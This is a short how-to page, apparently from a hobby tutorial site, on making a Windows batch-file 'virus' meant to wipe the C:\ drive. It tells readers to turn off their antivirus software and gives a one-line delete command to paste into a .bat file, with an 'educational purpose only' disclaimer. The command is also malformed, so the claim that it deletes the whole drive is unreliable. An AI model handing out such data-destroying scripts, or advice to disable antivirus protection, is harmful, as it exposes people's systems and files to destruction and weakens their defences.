How to Make a Windows Hack Script (Notepad)

by Like Tea in Circuits > Computers

48 Views, 1 Favorites, 0 Comments

How to Make a Windows Hack Script (Notepad)

download.png

This tutorial will show you how to make a virus that deletes your whole C:\ Drive!

NOTE: This post is solely and mainly for educational purpose only. I am nowhere responsible for any kind of damage caused by this tutorial.

Making the File

How To Make A Windows Hack (Notepad) (Deletes C:\ Drive)

To make the Windows Hack, first you want to open "File Explorer", right click then click "New" - "Text Document".

After that you need to make sure that in view you have checked the box "File Name Extensions", this is so you change the file extension. Now name the text document "<name>.bat", make sure you added .bat at the end! Congratulations you have completed the first step to making your Notepad Virus!!

Windows Hack Script

Make sure to turn off your Anti Virus Software, otherwise your script will be removed. Copy & Paste this script into your .bat file by clicking the file, right clicking and selecting "edit".

@Echo off
Del C:\ *.* |y

Save File

Now all you need to do to finish the Windows Hack is to click "save", or Ctrl S.